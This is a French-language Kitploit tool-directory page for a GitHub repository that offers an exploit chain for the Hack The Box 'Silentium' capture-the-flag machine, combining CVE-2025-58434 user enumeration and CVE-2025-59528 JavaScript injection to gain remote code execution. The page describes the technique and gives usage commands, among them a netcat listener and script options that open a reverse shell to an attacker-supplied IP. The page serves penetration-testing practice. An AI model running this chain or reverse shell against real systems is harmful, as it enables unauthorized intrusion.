Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434-59528-htb-ctf — Exploitation Silentium HTB-CTF | Kitploit
Outils/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
Génération de PayloadsExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

Exploitation Silentium HTB-CTF

Voir le dépôt
22il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58434-59528-htb-ctf

Silentium Exploit Chain

Ce dépôt contient la chaîne d'exploitation complète pour la machine Silentium sur Hack The Box. L'exploit exploite une vulnérabilité en deux étapes impliquant l'énumération d'utilisateurs et l'injection JavaScript pour obtenir une exécution de code à distance (RCE).

📝 Description

La chaîne de vulnérabilité consiste en une faille de divulgation d'informations et une injection de code critique. En énumérant d'abord les utilisateurs valides via un bogue de réinitialisation de mot de passe, nous obtenons le contexte nécessaire pour cibler le point de terminaison customMCP. La RCE est obtenue en injectant une fonction JavaScript malveillante dans le paramètre mcpServerConfig, qui est exécutée par le backend Node.js.

🛠️ Fonctionnalités

  • Énumération d'utilisateurs : Automatise la découverte d'e-mails système valides à l'aide d'une liste de mots.
  • Injection JavaScript : Utilise une IIFE (Immediately Invoked Function Expression) pour contourner l'assainissement.
  • Shell inverse TCP : Génère un shell stable en utilisant un tube mkfifo.
  • Automatisation des charges utiles : Gère automatiquement l'échappement JSON et l'authentification par jeton Bearer.

🚀 Prérequis

Vous devez avoir Python 3 et Bash installés, ainsi que la bibliothèque suivante :

pip install requests

💻 Utilisation

1. Énumérer les utilisateurs

Exécutez le script d'énumération (Bash) pour trouver les comptes valides (nécessite users.txt) :

python3 CVE-2025-58434.py

2. Démarrer votre écouteur

Sur votre machine locale, démarrez un écouteur Netcat :

nc -lvnp 4444

3. Exécuter l'exploit

Exécutez le script Python en fournissant la cible, votre IP et la clé API obtenue :

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ Arguments

ArgumentDescriptionRequis
-t, --targetHôte cibleOui
-k, --keyJeton Bearer APIOui
-l, --lhostVotre IP d'écouteur (VPN)Oui
-p, --lportVotre port d'écouteurOui

⚠️ Avertissement

Ce script est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement dans le cadre d'environnements CTF. Accéder ou attaquer des cibles sans autorisation préalable est illégal.


Défi : Silentium (Hack The Box)
CVE : CVE-2025-58434 | CVE-2025-59528

Télécharger l’outil